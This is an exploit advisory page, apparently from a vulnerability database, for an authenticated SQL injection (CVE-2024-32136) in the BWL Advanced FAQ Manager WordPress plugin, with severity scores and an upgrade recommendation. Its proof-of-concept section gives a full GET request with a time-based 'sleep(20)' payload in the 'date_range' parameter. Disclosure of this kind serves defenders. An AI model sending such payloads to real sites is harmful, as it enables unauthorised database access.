Lucene search
Ivan Spiridonov1337DAY-ID-39630HistoryJun 02, 2024 - 12:00 a.m.
BWL Advanced FAQ Manager 2.0.3 SQL Injection Vulnerability
2024-06-0200:00:00
Ivan Spiridonov
0day.today
9
sql injection
vulnerability
bwl advanced faq manager
authenticated
manipulation
get request
update
7.6 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
LOW
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L
6.7 Medium
AI Score
Confidence
Low
0.0004 Low
EPSS
Percentile
9.1%
Exploit Title: BWL Advanced FAQ Manager 2.0.3 - Authenticated SQL Injection
Exploit Author: Ivan Spiridonov (xbz0n)
Software Link: https://codecanyon.net/item/bwl-advanced-faq-manager/5007135
Version: 2.0.3
Tested on: Ubuntu 20.04
CVE: CVE-2024-32136
SQL Injection
SQL injection is a type of security vulnerability that allows an attacker to interfere with an application's database queries. It usually involves the insertion or "injection" of an SQL query via the input data from the client into the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.
Affected Components
Plugin: BWL Advanced FAQ Manager
Version: 2.0.3
Affected Parameter: 'date_range'
Affected Page: /wp-admin/edit.php
Description
The vulnerability exists within the 'date_range' parameter used in the 'bwl-advanced-faq-analytics' page of the BWL Advanced FAQ Manager plugin. Authenticated attackers can execute arbitrary SQL commands within the database by manipulating the input to this parameter.
Proof of Concept
Manual Exploitation
The following GET request demonstrates the vulnerability:
GET /wp-admin/edit.php?page=bwl-advanced-faq-analytics&post_type=bwl_advanced_faq&filter_type=views&date_range=(select*from(select(sleep(20)))a)&faq_id=all HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://localhost/wp-admin/edit.php?post_type=bwl_advanced_faq&page=bwl-advanced-faq-analytics
Connection: close
Cookie: [Relevant Cookies]
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
If the server response is delayed by approximately 20 seconds, it indicates a successful exploitation of the time-based SQL Injection, confirming the vulnerability.
Recommendations
BWL Advanced FAQ Manager v2.0.3 users are advised to update the plugin to the fixed version v2.0.4.
Related
cve
cve
CVE-2024-32136
2024-04-15 08:15:14
cvelist
cvelist
exploitdb
exploitdb
BWL Advanced FAQ Manager 2.0.3 - Authenticated SQL Injection
2024-05-31 00:00:00
wpvulndb
wpvulndb
nvd
nvd
CVE-2024-32136
2024-04-15 08:15:14
vulnrichment
vulnrichment
packetstorm
packetstorm
BWL Advanced FAQ Manager 2.0.3 SQL Injection
2024-05-31 00:00:00
wordfence
wordfence
7.6 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
LOW
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L
6.7 Medium
AI Score
Confidence
Low
0.0004 Low
EPSS
Percentile
9.1%
Related for 1337DAY-ID-39630